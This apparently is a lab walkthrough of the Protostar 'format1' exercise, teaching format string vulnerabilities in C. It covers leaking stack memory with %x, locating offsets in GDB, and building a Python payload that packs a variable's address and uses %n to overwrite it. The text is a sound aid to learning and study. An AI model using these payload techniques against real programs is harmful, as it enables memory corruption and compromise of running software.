Format strings are a handy way for programmers to whip up a
string from several variables. They are designed to save the programmer
time and make their code look much cleaner. Unbeknownst to some
programmers, format strings can also be used by an attacker to
compromise their entire program. Today we are going to take a look at
just how we can use a format string to exploit a running program.
What Is a Format String?

As mentioned above, a format string is a neat method by which a programmer can structure a string that they plan to either print or store in a variable. In the C programming language, a format string looks something like this:

printf("We have %d dogs", 2);

And it will output something like this:

We have 2 dogs

The secret ingredient in the format string is the format specifier. The format specifier is the “%d” in the command we just wrote. When the program sees a format specifier, it knows to expect a variable to replace that specifier. In this case, the variable was the integer 2.
Here’s another example:

char *person1 = "Bob";
char *person2 = "Alice";
int books = 15;
printf("%s and %s have %d books", person1, person2, books);

Let’s go line by line and walk through exactly what the program does. On the first two lines, we define two strings, person1 and person2, and assign them the values “Bob” and “Alice” respectively. On line three, we define an integer variable named books and give it the value 15. Finally, on the last line we print out a formatted string. In the string we see two distinct format specifiers, “%s” and “%d”. As you might have guessed, each one expects a different data type: “%s” expects a string (more precisely, a pointer to a null-terminated character array), while “%d” expects an integer. There are several other format specifiers as well. These include “%x”, which prints an unsigned integer in hexadecimal, and “%c”, which prints a single character.

Now that we know how to use format strings, it’s time to learn how to misuse them!
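If you want to experiment with specifiers without compiling any C, Python’s % string operator accepts the same printf-style specifiers. The sketch below is Python rather than the C from the examples, so treat it as an analogy; the variable names are just for illustration. It shows each specifier consuming the next value, left to right.

```python
# Python's % operator understands printf-style specifiers like C's printf.
person1 = "Bob"
person2 = "Alice"
books = 15

# Each specifier consumes the next value in the tuple, left to right.
sentence = "%s and %s have %d books" % (person1, person2, books)
dogs = "We have %d dogs" % 2
as_hex = "%x" % 255   # unsigned integer shown in hexadecimal
as_char = "%c" % 65   # integer 65 shown as the character it encodes

print(sentence)  # Bob and Alice have 15 books
print(dogs)      # We have 2 dogs
print(as_hex)    # ff
print(as_char)   # A
```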
Taking Advantage of Vulnerable Functions

While format strings may seem to be merely a different programming technique for concatenating variables and strings, this is not actually the case. Our example above should raise one very important question: What happens when a string contains a format specifier, but no variable is supplied to replace it? Let’s hop back into the Protostar virtual machine and find out.

If you don’t yet have Protostar installed, check out the installation guide in our first article on exploit development.

Once again we will SSH into our virtual machine with the username “user” and the password “user”. Once we’re logged in, it might be a good idea to type the following command:

bash

This will take us from our current shell to a much more interactive shell called bash, which will make our command-line experience much smoother.

Once that is taken care of, we’re going to jump right in and take a look at the format1 level. Let’s move to the same directory as the format1 executable by typing:

cd /opt/protostar/bin

Now, before we recklessly fling ourselves at the challenge, let’s take a look at the format1 source code, which is available on Exploit Exercises. This source code might be a little intimidating for those unfamiliar with C programming, but I promise it’s not that bad.

Going line by line, we first see a global integer named target being declared without a value. The fact that this variable is declared globally instead of inside a function is very important, because it changes where in memory the variable is stored.
Instead of being stored on the stack, the target variable will be stored in the uninitialized data (BSS) section of the program. This means we won’t be able to simply flood the stack with an ungodly amount of characters to alter the value of target, as we did with stack overflow vulnerabilities in previous articles.

Continuing through the program, we see a function declared with the name vuln. I wonder if this is where we will find the format string vulnerability…

The first thing that happens in the vuln function is a call to the printf function. This call prints the contents of the variable named string. We first see a reference to string on line 8, where it is declared as a parameter of the vuln function. This means that when vuln is called, a string is passed as an argument and given the name “string” for use inside the function. Crucially, string is handed to printf as the format string itself, so any format specifiers it contains will be interpreted rather than printed literally.

Next we see an if statement. Essentially, the statement says “if the variable target holds any value besides zero, print the following string.” From this if statement we can gather that our objective is to somehow modify the target variable.

Finally, down on line 17 we can see the main function for the program. Inside main is a call to the vuln function we just looked at, with argv[1] passed as the argument. argv[1] refers to the first command-line argument given to the program when it is run. This is where we will place our exploit once it is finished.

For now, let’s just try to answer the question we posed above: What happens when you have a format specifier with no variable to replace it?
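For contrast, Python’s % operator, which borrows C’s specifiers, does check that every specifier has a matching value and refuses otherwise. The hypothetical helper `format_or_error` below simply catches that refusal so we can see it. C’s printf performs no such check, and that gap is exactly what the next section explores.

```python
def format_or_error(fmt, *args):
    """Apply Python's printf-style % formatting; return the error text instead of raising."""
    try:
        return fmt % args
    except TypeError as exc:
        return "TypeError: %s" % exc


print(format_or_error("We have %d dogs", 2))  # We have 2 dogs
print(format_or_error("We have %d dogs"))     # TypeError: not enough arguments for format string
```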
The Odd Truth

We can see from the above source code that whatever string we pass as a command-line argument to the program will be printed on line 10 by the call to printf. Knowing that, let’s stop talking about it and see what actually happens if we pass a format specifier as that argument:

Well, that’s…strange. When we pass the %d format specifier, instead of printing “%d” or throwing an error like we might expect, the program prints a seemingly random integer. Where is that integer coming from? We could fire up the GDB debugger and try to dig through the program to find it, but looking at memory in integer form is sort of messy. Maybe there’s a way we can get this number in hexadecimal form.

Like we mentioned earlier, there’s another format specifier that prints values in hexadecimal. Let’s see what happens if we replace %d with %x as our argument:

Lo and behold, we get a value (highlighted in red) that looks a lot like a hexadecimal value. Let’s see if we can find this value somewhere in memory with the GDB debugger. To start GDB and load the format1 program, let’s type the following:

gdb format1

Once GDB has started up, we need to set a breakpoint. Looking back at the source code, line 14 seems like a good choice, since it comes after the vulnerable printf call. To set a breakpoint, we type:

break 14

Now we’re all set to run the program. In GDB, you can run a program with command-line arguments by typing the run command followed by the arguments. In this case, we’ll type:

run %x

This will run the program with “%x” as the argument. Once we run the program, we should hit the breakpoint, as seen in the image below:

When we hit a breakpoint, execution of the program is halted. From here we can examine individual chunks of memory with the “x” command. Let’s start by looking at the stack. To do this, we’ll type:

x/32x $esp

The first x is short for “examine.” This command allows us to examine memory, so the name is fitting. The /32 specifies that we want to examine 32 units, and the x after it tells GDB to display them in hexadecimal. GDB’s default unit is a four-byte word, so we get 32 four-byte segments. The last term, “$esp”, tells the command to start at the address held in the stack pointer register, ESP, which is the current top of the stack. Let’s see what output we get from this command:

Now we can see a ton of data from the stack, but one section should stick out to us: That same hexadecimal value that was printed earlier is sitting on the stack!

We finally have the answer to our question. When a format specifier doesn’t have a corresponding variable to replace it, printf simply grabs whatever value sits in memory at the location where it expected that variable to be, which here is the next slot on the stack. When a program improperly lets a user supply the format string itself, an attacker gains the ability to read data right out of memory.
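To make that answer concrete, here is a toy Python model of what printf does on 32-bit x86 when it is handed only a format string. It is a hypothetical simplification, not libc’s implementation: `toy_printf` and the word values in `stack` are invented for illustration, and the list stands in for the stack words printf would fetch as arguments, in order. The point to notice is that nothing checks whether an argument was actually passed.

```python
def toy_printf(fmt, stack):
    """Hypothetical toy model of printf's %d, %x, %c and %% handling.

    Each specifier takes the next 32-bit word from `stack`, whether or not the
    caller actually supplied an argument there.
    """
    out = []
    slot = 0  # index of the next stack word printf will treat as an argument
    i = 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt):
            spec = fmt[i + 1]
            if spec == "%":
                out.append("%")
            else:
                word = stack[slot] & 0xFFFFFFFF
                slot += 1
                if spec == "d":
                    # Reinterpret the 32-bit word as a signed integer.
                    out.append(str(word - (1 << 32) if word & 0x80000000 else word))
                elif spec == "x":
                    out.append("%x" % word)
                elif spec == "c":
                    out.append(chr(word & 0xFF))
                else:
                    raise ValueError("toy model only handles %d, %x, %c and %%")
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


# Hypothetical stack contents: whatever words happen to sit where arguments would be.
stack = [0xB7FF1040, 0x0804845B, 0xFFFFFFFF]
print(toy_printf("%x", stack))        # b7ff1040
print(toy_printf("%x.%x.%d", stack))  # b7ff1040.804845b.-1
```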
Going from Reading Data to Writing Data

While reading data we shouldn’t be able to read is interesting, writing data that we shouldn’t be able to write is way more fun. With this fun comes complication, however, so hold onto your keyboards and get ready.

There is one more format specifier we have yet to talk about: “%n”. While every other format specifier we have seen is focused on reading a particular type of data, %n is focused on writing data. Specifically, %n writes the number of characters printed so far to the address of an integer variable. The important thing to note here is that the %n format specifier expects the address of a variable, not the variable itself.

Well, wait a minute: If the program we’re looking at will automatically grab a value from the stack for the other format specifiers, will it automatically grab an address to write to for the %n specifier? Absolutely it will.
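Extending the same idea in a hypothetical toy model (again a sketch, not real libc code) shows how %n turns a read into a write. `toy_printf_n`, the `memory` dictionary, and the address 0x1000 are all invented for illustration: the dictionary stands in for the process’s memory, and the list stands in for the stack words printf consumes as arguments.

```python
def toy_printf_n(fmt, stack, memory):
    """Hypothetical toy model of printf's %x, %n and %% handling.

    stack  -- list of 32-bit words printf will treat as its arguments, in order
    memory -- dict mapping addresses to integers; %n writes into it
    """
    printed = []  # characters output so far
    slot = 0      # next stack word to consume
    i = 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt):
            spec = fmt[i + 1]
            if spec == "x":
                printed.append("%x" % stack[slot])
                slot += 1
            elif spec == "n":
                # %n prints nothing: it treats the next word as an address and
                # stores the number of characters printed so far at that address.
                address = stack[slot]
                slot += 1
                memory[address] = len("".join(printed))
            elif spec == "%":
                printed.append("%")
            else:
                raise ValueError("toy model only handles %x, %n and %%")
            i += 2
        else:
            printed.append(fmt[i])
            i += 1
    return "".join(printed)


TARGET = 0x1000  # hypothetical address standing in for &target
memory = {TARGET: 0}
output = toy_printf_n("AAAA.%x.%n", [0xDEAD, TARGET], memory)
print(output)          # AAAA.dead.
print(memory[TARGET])  # 10
```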
Getting to Where We Want to Be

In order for us to overwrite the target variable, we’re going to need to write its address to memory and then set up %n to write to that address. To do that, we first need to know where our original input is on the stack.
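The four A’s we are about to use as a starting marker are a deliberate choice. x86 stores multi-byte values in little-endian order, so %x prints each four-byte chunk with its bytes reversed relative to how they appear in our input. A uniform marker like AAAA reads the same either way; the short Python check below (variable names are illustrative) shows the reversal a mixed marker would produce.

```python
# x86 is little-endian: the byte at the lowest address is the least
# significant byte of a 32-bit word, so %x shows the bytes reversed.
marker_word = int.from_bytes(b"AAAA", "little")
print("%08x" % marker_word)  # 41414141

# A mixed marker makes the reversal visible.
mixed_word = int.from_bytes(b"ABCD", "little")
print("%08x" % mixed_word)   # 44434241
```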
Step 1: Finding Where We Are Starting From

In order to find where the string variable is located, let’s restart the program in GDB. This time, we’re going to type:

run AAAA.%x.%x

Once again we will hit the breakpoint, and we can start digging. To find the location of string, we’ll type the following:

p string

In this command, “p” is short for print. This command prints the variable we pass to it; because string is a char pointer, GDB shows both the address it points to and the text stored there. Our output should look something like this:

From this output we can gather that the contents of string are located at 0xbffff987. If we examine the memory at that location, we will in fact find the hexadecimal representation of the four A’s we typed at the beginning of our input.

Here’s the trick: This memory address (0xbffff987) is higher than the address of the data we read using the format specifier. printf fetches its missing arguments one word after another, moving toward higher addresses, so if we provided a string with enough format specifiers, we would keep climbing up the stack until we reach the beginning of our own string. If we do the math, we can find out just how many format specifiers we would need to do that:

By subtracting the address of the data on the stack from the starting address of the string, we can see that the two are 547 bytes apart. Rounding that up to 548 and dividing by four (the size of each value %x reads), we can see we will need roughly 137 format specifiers to return to our original string. This sounds like a job for a Python script.
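The arithmetic above can be written as a small Python helper. This is a sketch under stated assumptions: `specifiers_needed` is a hypothetical name, each %x is assumed to consume exactly four bytes, and `LEAK_ADDR` is not taken from GDB but back-computed from the 547-byte distance and the 0xbffff987 address quoted above. Because the memory layout shifts between GDB and a normal run, treat the result as an estimate.

```python
STRING_ADDR = 0xBFFFF987            # address of our input reported by `p string`
DISTANCE = 547                      # bytes between the leaked stack data and our input
LEAK_ADDR = STRING_ADDR - DISTANCE  # implied by the two figures above, not read from GDB


def specifiers_needed(string_addr, leak_addr, word_size=4):
    """Estimate how many %x specifiers it takes to walk from leak_addr up to string_addr."""
    distance = string_addr - leak_addr
    return -(-distance // word_size)  # ceiling division: a partial word still needs a specifier


print(hex(LEAK_ADDR))                             # 0xbffff764
print(specifiers_needed(STRING_ADDR, LEAK_ADDR))  # 137
```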
Step 2: Writing a Skeleton for Our Exploit

Let’s exit out of GDB and type the following command to return to our home directory:

cd

Short and sweet. Once we’re home, let’s use the nano text editor to open up a new text document:

nano exploit.py

Once we’re in nano, let’s type up a skeleton exploit:

Going through the code, the first line tells the system that when it tries to execute this file, it should use the Python interpreter. The next two lines import modules that we’ll need for the exploit. The os module will allow us to make a system call to run the format1 program. The struct module will come in handy when it comes to writing memory addresses later on.

Line four creates an absolute whale of a string variable named payload. Inside that variable we will be storing four A’s along with 137 format specifiers. It’s very important to note the periods that are placed within the string. Depending on how long or short the payload is, the string’s position in memory shifts slightly, so the four-byte chunks each format specifier reads line up differently with our input. We need to make sure that all four of our A’s stay in the same four-byte chunk, so that a single format specifier reads them. When practicing on your own, you’ll just have to play around with the length of the string until you find a combination that works.

Once we’re done writing the skeleton script, we can save it and run it. Running our exploit skeleton yields the following output:

Because we supplied 137 format specifiers, we got 137 four-byte chunks of memory. This includes the memory we were looking at in GDB earlier.

Looking at the output, we can see our four A’s (highlighted in red). We seem to have overestimated how many format specifiers we needed, though. This is most likely because a program’s memory layout is slightly different when it runs inside GDB than when it runs by itself; GDB sets a few extra environment variables, for example, which sit near the top of the stack and shift everything below them. Editing our exploit so we only supply 132 format specifiers instead of 137 should put us exactly where we want to be:

Perfect. From here we can see the light at the end of the tunnel. The glory of exploitation is almost upon us, but there is one more step.
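The skeleton script itself appears only as a screenshot in the original, so what follows is not the author’s code but a hypothetical Python 3 sketch of the same idea. Assumptions: the payload layout (marker, then `.%x` repeated) is a guess at where the periods go, the helper names are invented, and `subprocess.run` is swapped in for the os module so the payload is passed as argv[1] without any shell quoting. `marker_position` automates the step of spotting the 41414141 chunk in the output.

```python
import subprocess

FORMAT1 = "/opt/protostar/bin/format1"  # directory from the cd command earlier


def skeleton_payload(count):
    """Marker followed by `count` dot-separated %x specifiers (hypothetical layout)."""
    return "AAAA" + ".%x" * count


def marker_position(output, marker="41414141"):
    """Return the 1-based number of the %x field that printed `marker`, or None."""
    fields = output.split(".")
    # fields[0] is the literal "AAAA"; fields[1:] are the %x results in order.
    for position, field in enumerate(fields[1:], start=1):
        if field == marker:
            return position
    return None


def run_format1(payload):
    """Run format1 with the payload as argv[1] (only meaningful on the Protostar VM)."""
    result = subprocess.run([FORMAT1, payload], stdout=subprocess.PIPE)
    return result.stdout.decode("latin-1")
```

On the Protostar VM you could try `print(marker_position(run_format1(skeleton_payload(137))))`. If it returns None, the A’s are probably straddling two chunks, and the padding needs adjusting as described above.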
Step 3: Locating & Overwriting the Target Variable

We need to hop back into GDB one more time to get an important piece of information. We’re going to replace the four A’s at the beginning of our payload string with the address of the target variable. That way, we can replace the last %x specifier with a %n specifier, which will read the address of target from our string and overwrite target with the number of characters printed so far. To get the address of target, we type the following into GDB:

p &target

The “&” in front of the variable name tells GDB that we want the address of the variable, not the value of the variable itself. Running that command yields the following result:

Now all we have to do is slap that bad boy into our program and we should be good to go. Our final exploit should look like this now:

There were two changes made. First, we added a new variable called address, which holds the address of the target variable. We use the struct.pack function to turn that address into four raw bytes in the little-endian order that x86 uses, so the format1 program interprets them correctly when %n reads them as a pointer.

The second change comes when we create the payload variable. Instead of starting the string with four A’s, we now start with the address variable. We make sure to include the period afterwards so the address stays aligned with where the format specifiers are reading from. We also use one fewer %x format specifier and put a %n format specifier in its place. This way, the %n format specifier takes the address we wrote at the beginning of the string as its argument and overwrites the data at that address. In this case, that address will (hopefully!) be the address of the target variable.
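Likewise, the final exploit is only shown as a screenshot, so here is a hypothetical Python 3 sketch of the two changes just described. `TARGET_ADDR` is a placeholder, not the value from the article; replace it with what `p &target` prints on your VM. The format string passed to struct.pack requests an unsigned 32-bit integer in little-endian byte order, and `count=132` reuses the figure found above, which may differ on your machine.

```python
import struct

# Hypothetical placeholder: substitute the address that `p &target` prints on your VM.
TARGET_ADDR = 0x08049638


def final_payload(target_addr, count=132):
    """Skeleton layout with the marker swapped for target's address and the last %x swapped for %n."""
    address = struct.pack("<I", target_addr)  # 4 raw bytes, little-endian like x86
    return address + b".%x" * (count - 1) + b".%n"


payload = final_payload(TARGET_ADDR)
print(payload[:4])           # b'8\x96\x04\x08'
print(payload.count(b"%x"))  # 131
```

Because the payload is bytes, on the VM it can be passed straight through as an element of the argv list (for example to subprocess.run) without decoding it first.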
Step 4: Basking in Our Success

Once we’ve made the necessary changes to the program, let’s see what happens when we run it:

The program confirms that we hit the target variable perfectly and overwrote its data with our own. Sweet victory.

Thank you for reading! Format string exploitation is a bit of a monster to understand at first, and while these vulnerabilities don’t often appear in the wild anymore, they are really great for helping you better understand what is actually going on behind the scenes of a program. Comment below with any questions or contact me via Twitter @xAllegiance.